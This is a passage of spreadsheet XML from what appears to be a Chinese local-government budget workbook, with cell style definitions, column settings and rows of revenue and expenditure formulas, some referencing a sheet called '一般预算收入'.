    <cellStyle name="输入 4 6" xfId="12535"/>
    <cellStyle name="输入 4 6 2" xfId="12536"/>
    <cellStyle name="输入 4 6 3" xfId="12537"/>
    <cellStyle name="输入 4 6 4" xfId="12538"/>
    <cellStyle name="输入 4 6 5" xfId="12539"/>
    <cellStyle name="输入 4 6 6" xfId="12540"/>
    <cellStyle name="输入 4 6 7" xfId="12541"/>
    <cellStyle name="输入 4 7" xfId="12542"/>
    <cellStyle name="输入 4 7 2" xfId="12543"/>
    <cellStyle name="输入 4 7 3" xfId="12544"/>
    <cellStyle name="输入 4 7 4" xfId="12545"/>
    <cellStyle name="输入 4 7 5" xfId="12546"/>
    <cellStyle name="输入 4 7 6" xfId="12547"/>
    <cellStyle name="输入 4 7 7" xfId="12548"/>
    <cellStyle name="输入 4 8" xfId="12549"/>
    <cellStyle name="输入 4 8 2" xfId="12550"/>
    <cellStyle name="输入 4 8 3" xfId="12551"/>
    <cellStyle name="输入 4 8 4" xfId="12552"/>
    <cellStyle name="输入 4 8 5" xfId="12553"/>
    <cellStyle name="输入 4 8 6" xfId="12554"/>
    <cellStyle name="输入 4 8 7" xfId="12555"/>
    <cellStyle name="输入 5" xfId="12556"/>
    <cellStyle name="输入 6" xfId="12557"/>
    <cellStyle name="输入 7" xfId="12558"/>
    <cellStyle name="输入 8" xfId="12559"/>
    <cellStyle name="输入 9" xfId="12560"/>
    <cellStyle name="输入 9 2" xfId="12561"/>
    <cellStyle name="输入 9 3" xfId="12562"/>
    <cellStyle name="输入 9 4" xfId="12563"/>
    <cellStyle name="输入 9 5" xfId="12564"/>
    <cellStyle name="输入 9 6" xfId="12565"/>
    <cellStyle name="输入 9 7" xfId="12566"/>
    <cellStyle name="样式 1" xfId="12567"/>
    <cellStyle name="样式 1 2" xfId="12568"/>
    <cellStyle name="一般_2007.11.19balance sheet" xfId="11699"/>
    <cellStyle name="注释" xfId="12569"/>
    <cellStyle name="注释 10" xfId="6977"/>
    <cellStyle name="注释 10 2" xfId="12570"/>
    <cellStyle name="注释 10 3" xfId="12571"/>
    <cellStyle name="注释 10 4" xfId="12572"/>
    <cellStyle name="注释 10 5" xfId="12573"/>
    <cellStyle name="注释 10 6" xfId="12574"/>
    <cellStyle name="注释 10 7" xfId="12575"/>
    <cellStyle name="注释 11" xfId="6979"/>
    <cellStyle name="注释 11 2" xfId="12576"/>
    <cellStyle name="注释 11 3" xfId="12577"/>
    <cellStyle name="注释 11 4" xfId="12578"/>
    <cellStyle name="注释 11 5" xfId="12579"/>
    <cellStyle name="注释 11 6" xfId="12580"/>
    <cellStyle name="注释 11 7" xfId="12581"/>
    <cellStyle name="注释 12" xfId="6981"/>
    <cellStyle name="注释 12 2" xfId="12582"/>
    <cellStyle name="注释 12 3" xfId="12583"/>
    <cellStyle name="注释 12 4" xfId="12584"/>
    <cellStyle name="注释 12 5" xfId="12585"/>
    <cellStyle name="注释 12 6" xfId="12586"/>
    <cellStyle name="注释 12 7" xfId="12587"/>
    <cellStyle name="注释 13" xfId="6983"/>
    <cellStyle name="注释 13 2" xfId="12588"/>
    <cellStyle name="注释 13 3" xfId="12589"/>
    <cellStyle name="注释 13 4" xfId="12590"/>
    <cellStyle name="注释 13 5" xfId="10596"/>
    <cellStyle name="注释 13 6" xfId="12591"/>
    <cellStyle name="注释 13 7" xfId="12592"/>
    <cellStyle name="注释 14" xfId="12593"/>
    <cellStyle name="注释 14 2" xfId="12594"/>
    <cellStyle name="注释 14 3" xfId="12595"/>
    <cellStyle name="注释 14 4" xfId="12596"/>
    <cellStyle name="注释 14 5" xfId="12597"/>
    <cellStyle name="注释 14 6" xfId="12598"/>
    <cellStyle name="注释 14 7" xfId="12599"/>
    <cellStyle name="注释 15" xfId="12600"/>
    <cellStyle name="注释 15 2" xfId="12601"/>
    <cellStyle name="注释 15 3" xfId="12602"/>
    <cellStyle name="注释 15 4" xfId="12603"/>
    <cellStyle name="注释 15 5" xfId="12604"/>
    <cellStyle name="注释 15 6" xfId="12605"/>
    <cellStyle name="注释 15 7" xfId="12606"/>
    <cellStyle name="注释 2" xfId="12607"/>
    <cellStyle name="注释 2 2" xfId="12608"/>
    <cellStyle name="注释 2 2 2" xfId="10474"/>
    <cellStyle name="注释 2 2 3" xfId="10476"/>
    <cellStyle name="注释 2 2 4" xfId="10478"/>
    <cellStyle name="注释 2 2 5" xfId="10480"/>
    <cellStyle name="注释 2 2 6" xfId="12609"/>
    <cellStyle name="注释 2 2 7" xfId="2993"/>
    <cellStyle name="注释 2 3" xfId="12610"/>
    <cellStyle name="注释 2 3 2" xfId="10485"/>
    <cellStyle name="注释 2 3 3" xfId="10487"/>
    <cellStyle name="注释 2 3 4" xfId="10489"/>
    <cellStyle name="注释 2 3 5" xfId="10491"/>
    <cellStyle name="注释 2 3 6" xfId="12611"/>
    <cellStyle name="注释 2 3 7" xfId="3001"/>
    <cellStyle name="注释 2 4" xfId="12612"/>
    <cellStyle name="注释 2 4 2" xfId="10496"/>
    <cellStyle name="注释 2 4 3" xfId="10498"/>
    <cellStyle name="注释 2 4 4" xfId="10500"/>
    <cellStyle name="注释 2 4 5" xfId="10502"/>
    <cellStyle name="注释 2 4 6" xfId="12613"/>
    <cellStyle name="注释 2 4 7" xfId="3009"/>
    <cellStyle name="注释 2 5" xfId="12614"/>
    <cellStyle name="注释 2 5 2" xfId="4281"/>
    <cellStyle name="注释 2 5 3" xfId="4286"/>
    <cellStyle name="注释 2 5 4" xfId="4291"/>
    <cellStyle name="注释 2 5 5" xfId="4351"/>
    <cellStyle name="注释 2 5 6" xfId="4355"/>
    <cellStyle name="注释 2 5 7" xfId="3016"/>
    <cellStyle name="注释 2 6" xfId="12615"/>
    <cellStyle name="注释 2 6 2" xfId="12616"/>
    <cellStyle name="注释 2 6 3" xfId="7529"/>
    <cellStyle name="注释 2 6 4" xfId="7531"/>
    <cellStyle name="注释 2 6 5" xfId="7533"/>
    <cellStyle name="注释 2 6 6" xfId="7535"/>
    <cellStyle name="注释 2 6 7" xfId="7537"/>
    <cellStyle name="注释 2 7" xfId="12617"/>
    <cellStyle name="注释 2 7 2" xfId="12618"/>
    <cellStyle name="注释 2 7 3" xfId="7540"/>
    <cellStyle name="注释 2 7 4" xfId="7542"/>
    <cellStyle name="注释 2 7 5" xfId="7544"/>
    <cellStyle name="注释 2 7 6" xfId="7546"/>
    <cellStyle name="注释 2 7 7" xfId="7548"/>
    <cellStyle name="注释 2 8" xfId="12619"/>
    <cellStyle name="注释 2 8 2" xfId="12620"/>
    <cellStyle name="注释 2 8 3" xfId="7551"/>
    <cellStyle name="注释 2 8 4" xfId="7553"/>
    <cellStyle name="注释 2 8 5" xfId="7555"/>
    <cellStyle name="注释 2 8 6" xfId="7557"/>
    <cellStyle name="注释 2 8 7" xfId="7559"/>
    <cellStyle name="注释 3" xfId="12621"/>
    <cellStyle name="注释 3 2" xfId="12622"/>
    <cellStyle name="注释 3 2 2" xfId="10535"/>
    <cellStyle name="注释 3 2 3" xfId="10537"/>
    <cellStyle name="注释 3 2 4" xfId="10539"/>
    <cellStyle name="注释 3 2 5" xfId="10541"/>
    <cellStyle name="注释 3 2 6" xfId="12623"/>
    <cellStyle name="注释 3 2 7" xfId="3600"/>
    <cellStyle name="注释 3 3" xfId="12624"/>
    <cellStyle name="注释 3 3 2" xfId="10546"/>
    <cellStyle name="注释 3 3 3" xfId="10548"/>
    <cellStyle name="注释 3 3 4" xfId="10550"/>
    <cellStyle name="注释 3 3 5" xfId="10552"/>
    <cellStyle name="注释 3 3 6" xfId="12625"/>
    <cellStyle name="注释 3 3 7" xfId="3606"/>
    <cellStyle name="注释 3 4" xfId="12626"/>
    <cellStyle name="注释 3 4 2" xfId="10557"/>
    <cellStyle name="注释 3 4 3" xfId="10559"/>
    <cellStyle name="注释 3 4 4" xfId="10561"/>
    <cellStyle name="注释 3 4 5" xfId="10563"/>
    <cellStyle name="注释 3 4 6" xfId="12627"/>
    <cellStyle name="注释 3 4 7" xfId="3612"/>
    <cellStyle name="注释 3 5" xfId="12628"/>
    <cellStyle name="注释 3 5 2" xfId="12629"/>
    <cellStyle name="注释 3 5 3" xfId="7582"/>
    <cellStyle name="注释 3 5 4" xfId="7584"/>
    <cellStyle name="注释 3 5 5" xfId="7586"/>
    <cellStyle name="注释 3 5 6" xfId="7588"/>
    <cellStyle name="注释 3 5 7" xfId="3620"/>
    <cellStyle name="注释 3 6" xfId="12630"/>
    <cellStyle name="注释 3 6 2" xfId="12631"/>
    <cellStyle name="注释 3 6 3" xfId="7590"/>
    <cellStyle name="注释 3 6 4" xfId="7592"/>
    <cellStyle name="注释 3 6 5" xfId="7594"/>
    <cellStyle name="注释 3 6 6" xfId="7596"/>
    <cellStyle name="注释 3 6 7" xfId="7598"/>
    <cellStyle name="注释 3 7" xfId="12632"/>
    <cellStyle name="注释 3 7 2" xfId="12633"/>
    <cellStyle name="注释 3 7 3" xfId="7601"/>
    <cellStyle name="注释 3 7 4" xfId="7603"/>
    <cellStyle name="注释 3 7 5" xfId="7605"/>
    <cellStyle name="注释 3 7 6" xfId="7607"/>
    <cellStyle name="注释 3 7 7" xfId="7609"/>
    <cellStyle name="注释 3 8" xfId="12634"/>
    <cellStyle name="注释 3 8 2" xfId="12635"/>
    <cellStyle name="注释 3 8 3" xfId="7612"/>
    <cellStyle name="注释 3 8 4" xfId="7614"/>
    <cellStyle name="注释 3 8 5" xfId="7616"/>
    <cellStyle name="注释 3 8 6" xfId="7618"/>
    <cellStyle name="注释 3 8 7" xfId="7620"/>
    <cellStyle name="注释 4" xfId="12636"/>
    <cellStyle name="注释 4 10" xfId="12637"/>
    <cellStyle name="注释 4 11" xfId="12638"/>
    <cellStyle name="注释 4 12" xfId="12639"/>
    <cellStyle name="注释 4 13" xfId="12640"/>
    <cellStyle name="注释 4 14" xfId="12641"/>
    <cellStyle name="注释 4 15" xfId="12642"/>
    <cellStyle name="注释 4 2" xfId="8953"/>
    <cellStyle name="注释 4 2 2" xfId="12643"/>
    <cellStyle name="注释 4 2 3" xfId="12644"/>
    <cellStyle name="注释 4 2 4" xfId="12645"/>
    <cellStyle name="注释 4 2 5" xfId="12646"/>
    <cellStyle name="注释 4 2 6" xfId="12647"/>
    <cellStyle name="注释 4 2 7" xfId="4001"/>
    <cellStyle name="注释 4 3" xfId="12648"/>
    <cellStyle name="注释 4 3 2" xfId="12649"/>
    <cellStyle name="注释 4 3 3" xfId="12650"/>
    <cellStyle name="注释 4 3 4" xfId="12651"/>
    <cellStyle name="注释 4 3 5" xfId="12652"/>
    <cellStyle name="注释 4 3 6" xfId="12653"/>
    <cellStyle name="注释 4 3 7" xfId="4007"/>
    <cellStyle name="注释 4 4" xfId="12654"/>
    <cellStyle name="注释 4 4 2" xfId="12655"/>
    <cellStyle name="注释 4 4 3" xfId="1791"/>
    <cellStyle name="注释 4 4 4" xfId="1793"/>
    <cellStyle name="注释 4 4 5" xfId="1795"/>
    <cellStyle name="注释 4 4 6" xfId="1797"/>
    <cellStyle name="注释 4 4 7" xfId="1799"/>
    <cellStyle name="注释 4 5" xfId="12656"/>
    <cellStyle name="注释 4 5 2" xfId="12657"/>
    <cellStyle name="注释 4 5 3" xfId="12658"/>
    <cellStyle name="注释 4 5 4" xfId="12659"/>
    <cellStyle name="注释 4 5 5" xfId="12660"/>
    <cellStyle name="注释 4 5 6" xfId="12661"/>
    <cellStyle name="注释 4 5 7" xfId="4013"/>
    <cellStyle name="注释 4 6" xfId="12662"/>
    <cellStyle name="注释 4 6 2" xfId="12663"/>
    <cellStyle name="注释 4 6 3" xfId="12664"/>
    <cellStyle name="注释 4 6 4" xfId="12665"/>
    <cellStyle name="注释 4 6 5" xfId="12666"/>
    <cellStyle name="注释 4 6 6" xfId="12667"/>
    <cellStyle name="注释 4 6 7" xfId="12668"/>
    <cellStyle name="注释 4 7" xfId="12669"/>
    <cellStyle name="注释 4 7 2" xfId="12670"/>
    <cellStyle name="注释 4 7 3" xfId="12671"/>
    <cellStyle name="注释 4 7 4" xfId="12672"/>
    <cellStyle name="注释 4 7 5" xfId="12673"/>
    <cellStyle name="注释 4 7 6" xfId="12674"/>
    <cellStyle name="注释 4 7 7" xfId="12675"/>
    <cellStyle name="注释 4 8" xfId="12676"/>
    <cellStyle name="注释 4 8 2" xfId="12677"/>
    <cellStyle name="注释 4 8 3" xfId="12678"/>
    <cellStyle name="注释 4 8 4" xfId="12679"/>
    <cellStyle name="注释 4 8 5" xfId="12680"/>
    <cellStyle name="注释 4 8 6" xfId="12681"/>
    <cellStyle name="注释 4 8 7" xfId="12682"/>
    <cellStyle name="注释 4 9" xfId="12683"/>
    <cellStyle name="注释 5" xfId="12684"/>
    <cellStyle name="注释 5 2" xfId="12685"/>
    <cellStyle name="注释 6" xfId="12686"/>
    <cellStyle name="注释 6 2" xfId="12687"/>
    <cellStyle name="注释 6 3" xfId="12688"/>
    <cellStyle name="注释 6 4" xfId="12689"/>
    <cellStyle name="注释 6 5" xfId="12690"/>
    <cellStyle name="注释 6 6" xfId="12691"/>
    <cellStyle name="注释 6 7" xfId="3387"/>
    <cellStyle name="注释 6 8" xfId="3391"/>
    <cellStyle name="注释 7" xfId="12692"/>
    <cellStyle name="注释 7 2" xfId="12693"/>
    <cellStyle name="注释 8" xfId="12694"/>
    <cellStyle name="注释 8 2" xfId="12695"/>
    <cellStyle name="注释 8 3" xfId="12696"/>
    <cellStyle name="注释 8 4" xfId="12697"/>
    <cellStyle name="注释 8 5" xfId="12698"/>
    <cellStyle name="注释 8 6" xfId="12699"/>
    <cellStyle name="注释 8 7" xfId="4158"/>
    <cellStyle name="注释 8 8" xfId="4550"/>
    <cellStyle name="注释 9" xfId="12700"/>
    <cellStyle name="注释 9 2" xfId="12701"/>
    <cellStyle name="注释 9 3" xfId="12702"/>
    <cellStyle name="注释 9 4" xfId="12703"/>
    <cellStyle name="注释 9 5" xfId="12704"/>
    <cellStyle name="注释 9 6" xfId="12705"/>
    <cellStyle name="注释 9 7" xfId="4163"/>
    <cellStyle name="콤마 [0]_BOILER-CO1" xfId="12706"/>
    <cellStyle name="콤마_BOILER-CO1" xfId="79"/>
    <cellStyle name="통화 [0]_BOILER-CO1" xfId="12707"/>
    <cellStyle name="통화_BOILER-CO1" xfId="12708"/>
    <cellStyle name="표준_0N-HANDLING " xfId="1270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Y74"/>
  <sheetViews>
    <sheetView showZeros="0" tabSelected="1" topLeftCell="A22" zoomScale="85" zoomScaleNormal="85" workbookViewId="0">
      <selection sqref="A1:W1"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9" defaultRowHeight="14.25"/>
  <cols>
    <col min="1" max="1" width="38.125" style="33" customWidth="1"/>
    <col min="2" max="2" width="9.75" style="33" customWidth="1"/>
    <col min="3" max="3" width="12.5" style="33" customWidth="1"/>
    <col min="4" max="4" width="7.625" style="33" hidden="1" customWidth="1"/>
    <col min="5" max="5" width="9.125" style="33" hidden="1" customWidth="1"/>
    <col min="6" max="6" width="13" style="33" customWidth="1"/>
    <col min="7" max="7" width="41.5" style="33" customWidth="1"/>
    <col min="8" max="8" width="11" style="33" customWidth="1"/>
    <col min="9" max="9" width="11.5" style="33" customWidth="1"/>
    <col min="10" max="11" width="7.625" style="33" hidden="1" customWidth="1"/>
    <col min="12" max="12" width="7.25" style="33" hidden="1" customWidth="1"/>
    <col min="13" max="13" width="8" style="33" hidden="1" customWidth="1"/>
    <col min="14" max="14" width="7.625" style="33" hidden="1" customWidth="1"/>
    <col min="15" max="15" width="8.375" style="33" hidden="1" customWidth="1"/>
    <col min="16" max="20" width="7.625" style="33" hidden="1" customWidth="1"/>
    <col min="21" max="21" width="9.875" style="33" hidden="1" customWidth="1"/>
    <col min="22" max="22" width="9.625" style="33" hidden="1" customWidth="1"/>
    <col min="23" max="23" width="11.25" style="33" customWidth="1"/>
    <col min="24" max="25" width="9" style="33" hidden="1" customWidth="1"/>
    <col min="26" max="26" width="9" style="33" customWidth="1"/>
    <col min="27" max="16384" width="9" style="33"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:25" ht="30.75" customHeight="1">
      <c r="A1" s="58" t="s">
        <v>803</v>
      </c>
      <c r="B1" s="58"/>
      <c r="C1" s="58"/>
      <c r="D1" s="58"/>
      <c r="E1" s="58"/>
      <c r="F1" s="58"/>
      <c r="G1" s="58"/>
      <c r="H1" s="58"/>
      <c r="I1" s="58"/>
      <c r="J1" s="58"/>
      <c r="K1" s="58"/>
      <c r="L1" s="58"/>
      <c r="M1" s="58"/>
      <c r="N1" s="58"/>
      <c r="O1" s="58"/>
      <c r="P1" s="58"/>
      <c r="Q1" s="58"/>
      <c r="R1" s="58"/>
      <c r="S1" s="58"/>
      <c r="T1" s="58"/>
      <c r="U1" s="58"/>
      <c r="V1" s="58"/>
      <c r="W1" s="58"/>
    </row>
    <row r="2" spans="1:25" ht="19.5" customHeight="1">
      <c r="V2" s="59" t="s">
        <v>0</v>
      </c>
      <c r="W2" s="59"/>
    </row>
    <row r="3" spans="1:25" s="32" customFormat="1" ht="26.25" customHeight="1">
      <c r="A3" s="60" t="s">
        <v>1</v>
      </c>
      <c r="B3" s="61"/>
      <c r="C3" s="61"/>
      <c r="D3" s="61"/>
      <c r="E3" s="61"/>
      <c r="F3" s="62"/>
      <c r="G3" s="60" t="s">
        <v>2</v>
      </c>
      <c r="H3" s="61"/>
      <c r="I3" s="61"/>
      <c r="J3" s="61"/>
      <c r="K3" s="61"/>
      <c r="L3" s="61"/>
      <c r="M3" s="61"/>
      <c r="N3" s="61"/>
      <c r="O3" s="61"/>
      <c r="P3" s="61"/>
      <c r="Q3" s="61"/>
      <c r="R3" s="61"/>
      <c r="S3" s="61"/>
      <c r="T3" s="61"/>
      <c r="U3" s="61"/>
      <c r="V3" s="61"/>
      <c r="W3" s="62"/>
      <c r="X3" s="57" t="s">
        <v>3</v>
      </c>
      <c r="Y3" s="57" t="s">
        <v>4</v>
      </c>
    </row>
    <row r="4" spans="1:25" s="45" customFormat="1" ht="45" customHeight="1">
      <c r="A4" s="11" t="s">
        <v>5</v>
      </c>
      <c r="B4" s="11" t="s">
        <v>6</v>
      </c>
      <c r="C4" s="11" t="s">
        <v>7</v>
      </c>
      <c r="D4" s="11" t="s">
        <v>8</v>
      </c>
      <c r="E4" s="11" t="s">
        <v>9</v>
      </c>
      <c r="F4" s="11" t="s">
        <v>10</v>
      </c>
      <c r="G4" s="11" t="s">
        <v>5</v>
      </c>
      <c r="H4" s="11" t="s">
        <v>6</v>
      </c>
      <c r="I4" s="11" t="s">
        <v>7</v>
      </c>
      <c r="J4" s="11" t="s">
        <v>11</v>
      </c>
      <c r="K4" s="11" t="s">
        <v>12</v>
      </c>
      <c r="L4" s="11" t="s">
        <v>8</v>
      </c>
      <c r="M4" s="11" t="s">
        <v>13</v>
      </c>
      <c r="N4" s="11" t="s">
        <v>14</v>
      </c>
      <c r="O4" s="11" t="s">
        <v>15</v>
      </c>
      <c r="P4" s="11" t="s">
        <v>16</v>
      </c>
      <c r="Q4" s="11" t="s">
        <v>17</v>
      </c>
      <c r="R4" s="11" t="s">
        <v>18</v>
      </c>
      <c r="S4" s="11" t="s">
        <v>19</v>
      </c>
      <c r="T4" s="11" t="s">
        <v>20</v>
      </c>
      <c r="U4" s="11" t="s">
        <v>21</v>
      </c>
      <c r="V4" s="11" t="s">
        <v>22</v>
      </c>
      <c r="W4" s="11" t="s">
        <v>10</v>
      </c>
      <c r="X4" s="57"/>
      <c r="Y4" s="57"/>
    </row>
    <row r="5" spans="1:25" s="32" customFormat="1" ht="29.25" customHeight="1">
      <c r="A5" s="5" t="s">
        <v>23</v>
      </c>
      <c r="B5" s="5">
        <f>SUM(B6:B21)-1</f>
        <v>76299.774999999994</v>
      </c>
      <c r="C5" s="5">
        <f>SUM(C6:C21)</f>
        <v>-19960.45</v>
      </c>
      <c r="D5" s="5">
        <f>SUM(D6:D21)</f>
        <v>0</v>
      </c>
      <c r="E5" s="5">
        <f>SUM(E6:E21)</f>
        <v>-19960.45</v>
      </c>
      <c r="F5" s="5">
        <f>C5+B5</f>
        <v>56339.324999999997</v>
      </c>
      <c r="G5" s="5" t="s">
        <v>24</v>
      </c>
      <c r="H5" s="5">
        <v>41967</v>
      </c>
      <c r="I5" s="5">
        <f t="shared" ref="I5" si="0">SUM(J5:V5)</f>
        <v>27090</v>
      </c>
      <c r="J5" s="5"/>
      <c r="K5" s="5"/>
      <c r="L5" s="5"/>
      <c r="M5" s="5"/>
      <c r="N5" s="5"/>
      <c r="O5" s="5"/>
      <c r="P5" s="5"/>
      <c r="Q5" s="5"/>
      <c r="R5" s="5"/>
      <c r="S5" s="5"/>
      <c r="T5" s="5"/>
      <c r="U5" s="5">
        <f>477+633</f>
        <v>1110</v>
      </c>
      <c r="V5" s="5">
        <f>25617+28+69+8+58+35+55+96-29+7+15+21</f>
        <v>25980</v>
      </c>
      <c r="W5" s="5">
        <f>H5+I5</f>
        <v>69057</v>
      </c>
      <c r="X5" s="32">
        <v>26640</v>
      </c>
      <c r="Y5" s="32">
        <f>X5/W5</f>
        <v>0.38576827837873062</v>
      </c>
    </row>
    <row r="6" spans="1:25" ht="17.25" customHeight="1">
      <c r="A6" s="3" t="s">
        <v>25</v>
      </c>
      <c r="B6" s="3">
        <f>一般预算收入!B5</f>
        <v>20542.875</v>
      </c>
      <c r="C6" s="3">
        <f t="shared" ref="C6" si="1">SUM(D6:E6)</f>
        <v>-1597.5</v>
      </c>
      <c r="D6" s="3"/>
      <c r="E6" s="3">
        <f>一般预算收入!E5</f>
        <v>-1597.5</v>
      </c>
      <c r="F6" s="3">
        <f t="shared" ref="F6" si="2">B6+C6</f>
        <v>18945.375</v>
      </c>
      <c r="G6" s="3" t="s">
        <v>26</v>
      </c>
      <c r="H6" s="3"/>
      <c r="I6" s="3">
        <f t="shared" ref="I6:I27" si="3">SUM(J6:V6)</f>
        <v>0</v>
      </c>
      <c r="J6" s="3"/>
      <c r="K6" s="3"/>
      <c r="L6" s="3"/>
      <c r="M6" s="3"/>
      <c r="N6" s="3"/>
      <c r="O6" s="3"/>
      <c r="P6" s="3"/>
      <c r="Q6" s="3"/>
      <c r="R6" s="3"/>
      <c r="S6" s="3"/>
      <c r="T6" s="3"/>
      <c r="U6" s="3"/>
      <c r="V6" s="3"/>
      <c r="W6" s="3">
        <f t="shared" ref="W6" si="4">H6+I6</f>
        <v>0</v>
      </c>
    </row>
    <row r="7" spans="1:25" ht="17.25" customHeight="1">
      <c r="A7" s="3" t="s">
        <v>27</v>
      </c>
      <c r="B7" s="3">
        <f>一般预算收入!B6</f>
        <v>0</v>
      </c>
      <c r="C7" s="3">
        <f t="shared" ref="C7:C21" si="5">SUM(D7:E7)</f>
        <v>0</v>
      </c>
      <c r="D7" s="3"/>
      <c r="E7" s="3">
        <f>一般预算收入!E6</f>
        <v>0</v>
      </c>
      <c r="F7" s="3">
        <f t="shared" ref="F7:F21" si="6">B7+C7</f>
        <v>0</v>
      </c>
      <c r="G7" s="3" t="s">
        <v>28</v>
      </c>
      <c r="H7" s="3">
        <v>980</v>
      </c>
      <c r="I7" s="3">
        <f t="shared" si="3"/>
        <v>175</v>
      </c>
      <c r="J7" s="3"/>
      <c r="K7" s="3"/>
      <c r="L7" s="3"/>
      <c r="M7" s="3"/>
      <c r="N7" s="3"/>
      <c r="O7" s="3"/>
      <c r="P7" s="3"/>
      <c r="Q7" s="3"/>
      <c r="R7" s="3"/>
      <c r="S7" s="3"/>
      <c r="T7" s="3"/>
      <c r="U7" s="3"/>
      <c r="V7" s="3">
        <f>172+3</f>
        <v>175</v>
      </c>
      <c r="W7" s="3">
        <f t="shared" ref="W7:W27" si="7">H7+I7</f>
        <v>1155</v>
      </c>
      <c r="X7" s="33">
        <v>588</v>
      </c>
      <c r="Y7" s="33">
        <f t="shared" ref="Y7" si="8">X7/W7</f>
        <v>0.50909090909090904</v>
      </c>
    </row>
    <row r="8" spans="1:25" ht="17.25" customHeight="1">
      <c r="A8" s="3" t="s">
        <v>29</v>
      </c>
      <c r="B8" s="3">
        <f>一般预算收入!B7</f>
        <v>3276.4000000000005</v>
      </c>
      <c r="C8" s="3">
        <f t="shared" si="5"/>
        <v>-11.200000000000001</v>
      </c>
      <c r="D8" s="3"/>
      <c r="E8" s="3">
        <f>一般预算收入!E7</f>
        <v>-11.200000000000001</v>
      </c>
      <c r="F8" s="3">
        <f t="shared" si="6"/>
        <v>3265.2000000000007</v>
      </c>
      <c r="G8" s="3" t="s">
        <v>30</v>
      </c>
      <c r="H8" s="3">
        <v>17848</v>
      </c>
      <c r="I8" s="3">
        <f t="shared" si="3"/>
        <v>3317</v>
      </c>
      <c r="J8" s="3"/>
      <c r="K8" s="3"/>
      <c r="L8" s="3"/>
      <c r="M8" s="3"/>
      <c r="N8" s="3"/>
      <c r="O8" s="3"/>
      <c r="P8" s="3"/>
      <c r="Q8" s="3"/>
      <c r="R8" s="3"/>
      <c r="S8" s="3"/>
      <c r="T8" s="3"/>
      <c r="U8" s="3">
        <f>381+35</f>
        <v>416</v>
      </c>
      <c r="V8" s="3">
        <f>2501+300+200-100</f>
        <v>2901</v>
      </c>
      <c r="W8" s="3">
        <f t="shared" si="7"/>
        <v>21165</v>
      </c>
      <c r="X8" s="33">
        <v>15823</v>
      </c>
      <c r="Y8" s="33">
        <f t="shared" ref="Y8:Y19" si="9">X8/W8</f>
        <v>0.74760217339948032</v>
      </c>
    </row>
    <row r="9" spans="1:25" ht="17.25" customHeight="1">
      <c r="A9" s="3" t="s">
        <v>31</v>
      </c>
      <c r="B9" s="3">
        <f>一般预算收入!B8</f>
        <v>1484.0000000000002</v>
      </c>
      <c r="C9" s="3">
        <f t="shared" si="5"/>
        <v>476.00000000000006</v>
      </c>
      <c r="D9" s="3"/>
      <c r="E9" s="3">
        <f>一般预算收入!E8</f>
        <v>476.00000000000006</v>
      </c>
      <c r="F9" s="3">
        <f t="shared" si="6"/>
        <v>1960.0000000000002</v>
      </c>
      <c r="G9" s="3" t="s">
        <v>32</v>
      </c>
      <c r="H9" s="3">
        <v>105351</v>
      </c>
      <c r="I9" s="3">
        <f t="shared" si="3"/>
        <v>13077</v>
      </c>
      <c r="J9" s="3"/>
      <c r="K9" s="3"/>
      <c r="L9" s="3"/>
      <c r="M9" s="3"/>
      <c r="N9" s="3"/>
      <c r="O9" s="3">
        <v>1770</v>
      </c>
      <c r="P9" s="3"/>
      <c r="Q9" s="3"/>
      <c r="R9" s="3"/>
      <c r="S9" s="3"/>
      <c r="T9" s="3"/>
      <c r="U9" s="3">
        <f>539+228</f>
        <v>767</v>
      </c>
      <c r="V9" s="3">
        <v>10540</v>
      </c>
      <c r="W9" s="3">
        <f t="shared" si="7"/>
        <v>118428</v>
      </c>
      <c r="X9" s="33">
        <v>73202</v>
      </c>
      <c r="Y9" s="33">
        <f t="shared" si="9"/>
        <v>0.61811395953659609</v>
      </c>
    </row>
    <row r="10" spans="1:25" ht="17.25" customHeight="1">
      <c r="A10" s="3" t="s">
        <v>33</v>
      </c>
      <c r="B10" s="3">
        <f>一般预算收入!B9</f>
        <v>0</v>
      </c>
      <c r="C10" s="3">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="D10" s="3"/>
      <c r="E10" s="3">
        <f>一般预算收入!E9</f>
        <v>0</v>
      </c>
      <c r="F10" s="3">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="G10" s="3" t="s">
        <v>34</v>
      </c>
      <c r="H10" s="3">
        <v>433</v>
      </c>
      <c r="I10" s="3">
        <f t="shared" si="3"/>
        <v>2207</v>
      </c>
      <c r="J10" s="3"/>
      <c r="K10" s="3"/>
      <c r="L10" s="3"/>
      <c r="M10" s="3"/>
      <c r="N10" s="3"/>
      <c r="O10" s="3"/>
      <c r="P10" s="3"/>
      <c r="Q10" s="3"/>
      <c r="R10" s="3"/>
      <c r="S10" s="3"/>
      <c r="T10" s="3"/>
      <c r="U10" s="3">
        <v>19</v>
      </c>
      <c r="V10" s="3">
        <f>2129+59</f>
        <v>2188</v>
      </c>
      <c r="W10" s="3">
        <f t="shared" si="7"/>
        <v>2640</v>
      </c>
      <c r="X10" s="33">
        <v>854</v>
      </c>
      <c r="Y10" s="33">
        <f t="shared" si="9"/>
        <v>0.32348484848484849</v>
      </c>
    </row>
    <row r="11" spans="1:25" ht="17.25" customHeight="1">
      <c r="A11" s="3" t="s">
        <v>35</v>
      </c>
      <c r="B11" s="3">
        <f>一般预算收入!B10</f>
        <v>112.5</v>
      </c>
      <c r="C11" s="3">
        <f t="shared" si="5"/>
        <v>131.25</v>
      </c>
      <c r="D11" s="3"/>
      <c r="E11" s="3">
        <f>一般预算收入!E10</f>
        <v>131.25</v>
      </c>
      <c r="F11" s="3">
        <f t="shared" si="6"/>
        <v>243.75</v>
      </c>
      <c r="G11" s="3" t="s">
        <v>36</v>
      </c>
      <c r="H11" s="3">
        <v>6329</v>
      </c>
      <c r="I11" s="3">
        <f t="shared" si="3"/>
        <v>1315</v>
      </c>
      <c r="J11" s="3"/>
      <c r="K11" s="3"/>
      <c r="L11" s="3"/>
      <c r="M11" s="3"/>
      <c r="N11" s="3"/>
      <c r="O11" s="3"/>
      <c r="P11" s="3"/>
      <c r="Q11" s="3"/>
      <c r="R11" s="3"/>
      <c r="S11" s="3"/>
      <c r="T11" s="3"/>
      <c r="U11" s="3">
        <f>404+17</f>
        <v>421</v>
      </c>
      <c r="V11" s="3">
        <f>884+10</f>
        <v>894</v>
      </c>
      <c r="W11" s="3">
        <f t="shared" si="7"/>
        <v>7644</v>
      </c>
      <c r="X11" s="33">
        <v>4878</v>
      </c>
      <c r="Y11" s="33">
        <f t="shared" si="9"/>
